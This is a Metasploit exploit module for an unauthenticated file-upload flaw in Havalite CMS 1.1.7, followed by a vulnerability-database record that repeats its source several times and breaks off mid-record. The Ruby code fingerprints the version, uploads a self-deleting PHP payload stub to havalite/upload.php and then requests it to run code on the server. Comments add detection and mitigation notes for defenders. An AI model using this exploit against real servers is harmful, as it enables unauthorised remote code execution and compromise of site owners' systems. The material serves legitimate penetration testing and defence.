ID MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC Type metasploit Reporter Rapid7 Modified 2017-09-08T01:18:50
Description
This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for the unauthenticated file upload flaw in
# Havalite CMS 1.1.7 (OSVDB 94405, EDB 26243).
#
# Flow visible in this file: `check` fingerprints the version string, `upload`
# POSTs a PHP file to havalite/upload.php without credentials, and `exec`
# requests that file back from havalite/tmp/files/ so the web server runs it.
#
# Defender notes (derived from the requests built below):
# * Detection: a multipart POST to havalite/upload.php whose `files[]` part
#   carries a `.php` filename, followed by a GET for the same name under
#   havalite/tmp/files/. Web server access logs are the durable evidence,
#   because the stub is requested with `unlink_self`.
# * Mitigation: require authentication on the upload endpoint, allow-list
#   upload extensions and content types server-side, and disable script
#   execution in the upload directory. No fixed version is named here.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata and the TARGETURI option.
  #
  # @param info [Hash] metadata merged into the defaults via update_info
  def initialize(info = {})
    # The %q{} body and its closing brace stay flush-left so the literal keeps
    # exactly the bytes of the listing.
    module_info = update_info(
      info,
      'Name' => 'Havalite CMS Arbitary File Upload Vulnerability',
      'Description' => %q{
This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and
possibly prior. Attackers can abuse the upload feature in order to upload a
malicious PHP file without authentication, which results in arbitrary remote code
execution.
},
      'License' => MSF_LICENSE,
      'Author' => [
        'CWH',
        'sinn3r' # Metasploit module
      ],
      'References' => [
        ['OSVDB', '94405'],
        ['EDB', '26243']
      ],
      'Payload' => { 'BadChars' => "\x00" },
      'Platform' => %w[linux php],
      'Targets' => [
        ['Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }],
        ['Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }]
      ],
      'Privileged' => false,
      'DisclosureDate' => 'Jun 17 2013',
      'DefaultTarget' => 0
    )
    super(module_info)

    base_path_option = OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])
    register_options([base_path_option])
  end

  # Version fingerprint only: reports Appears when the landing page exposes a
  # `myVersion` JavaScript variable containing "1.1.7". Only 1.1.7 is flagged
  # because neither the vendor nor OSVDB says exactly which releases are
  # affected.
  #
  # Caveats for anyone using this as a scanner:
  # * The upload endpoint itself is never probed, so Appears is not proof of
  #   exposure and Safe is not proof of a fix (the description says
  #   "possibly prior" versions are affected too).
  # * Safe is also returned for any response that lacks the version string,
  #   including pages that are not Havalite at all.
  # * The final match is unanchored, so any string containing "1.1.7"
  #   (for example "11.1.7") counts as a hit.
  #
  # @return [Exploit::CheckCode] Unknown on no response, Appears on a version
  #   hit, Safe otherwise
  def check
    landing_page = normalize_uri(target_uri.path, 'havalite/')
    res = send_request_raw({ 'uri' => landing_page })

    unless res
      vprint_error('Connection timed out')
      return Exploit::CheckCode::Unknown
    end

    # Greedy and multiline: the capture runs from the first inline script tag
    # to the last closing tag in the body.
    script_text = res.body.scan(/<script type="text\/javascript">(.+)<\/script>/im).flatten.first || ''
    version = script_text.scan(/var myVersion = '(.+)';/).flatten.first || ''
    return Exploit::CheckCode::Safe if version.empty? || version !~ /1\.1\.7/

    vprint_status("Version found: #{version}")
    Exploit::CheckCode::Appears
  end

  # Sends the payload stub to havalite/upload.php as the `files[]` form part
  # under a random five-letter `.php` name. The request carries no session or
  # credentials, which is the flaw being demonstrated: the endpoint accepts a
  # server-executable extension from an anonymous client.
  #
  # @param base [String] base path of the installation
  # @return [String] the file name used for the upload
  def upload(base)
    # unlink_self asks for the self-deleting stub variant (per the option
    # name), so the dropped file may not remain on disk for later triage.
    stub = get_write_exec_payload(unlink_self: true)
    php_name = "#{rand_text_alpha(5)}.php"

    form = Rex::MIME::Message.new
    form.add_part(stub, 'application/octet-stream', nil, %(form-data; name="files[]"; filename="#{php_name}"))
    body = form.to_s

    request = {
      'method' => 'POST',
      'uri' => normalize_uri(base, 'havalite', 'upload.php'),
      'ctype' => "multipart/form-data; boundary=#{form.bound}",
      'data' => body
    }
    res = send_request_cgi(request)

    # Any response other than a timeout, a 404 or an "abort" error body is
    # treated as a successful write.
    if !res
      fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
    elsif res.code.to_i == 404
      fail_with(Failure::NotFound, "#{peer} - No upload.php found")
    elsif res.body =~ /"error"\:"abort"/
      fail_with(Failure::Unknown, "#{peer} - Unable to write #{php_name}")
    end

    php_name
  end

  # Requests the uploaded file from havalite/tmp/files/ so the web server
  # interprets it. Only a 404 is treated as failure; a missing response is
  # ignored.
  #
  # @param base [String] base path of the installation
  # @param payload_fname [String] file name returned by #upload
  def exec(base, payload_fname)
    dropped_uri = normalize_uri(base, 'havalite', 'tmp', 'files', payload_fname)
    res = send_request_raw({ 'uri' => dropped_uri })

    fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}") if res && res.code == 404
  end

  # Entry point: upload the file, then request it.
  def exploit
    root = target_uri.path

    print_status('Uploading malicious file...')
    dropped_name = upload(root)

    print_status("Executing #{dropped_name}...")
    exec(root, dropped_name)
  end
end
{"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-10T23:28:06", "history": [{"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-05-03T20:42:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/exploit/unix/webapp/havalite_upload_exec", "reporter": "Rapid7", "references": ["#", "http://www.exploit-db.com/exploits/26243/"], "cvelist": [], "lastseen": "2017-07-02T23:57:20", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2017-07-02T23:57:20", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/exploit/unix/webapp/havalite_upload_exec", "reporter": "Rapid7", "references": ["#", "http://www.exploit-db.com/exploits/26243/"], "cvelist": [], "lastseen": "2017-07-24T20:01:54", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2017-07-24T20:01:54", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:30:02", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2017-08-21T15:30:02", "differentElements": ["description", "modified", "sourceData"], "edition": 3}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", 
"description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-09-13T00:32:56", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2017-09-13T00:32:56", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-18T06:17:56", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2017-10-18T06:17:56", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-18T07:04:27", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2017-10-18T07:04:27", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly 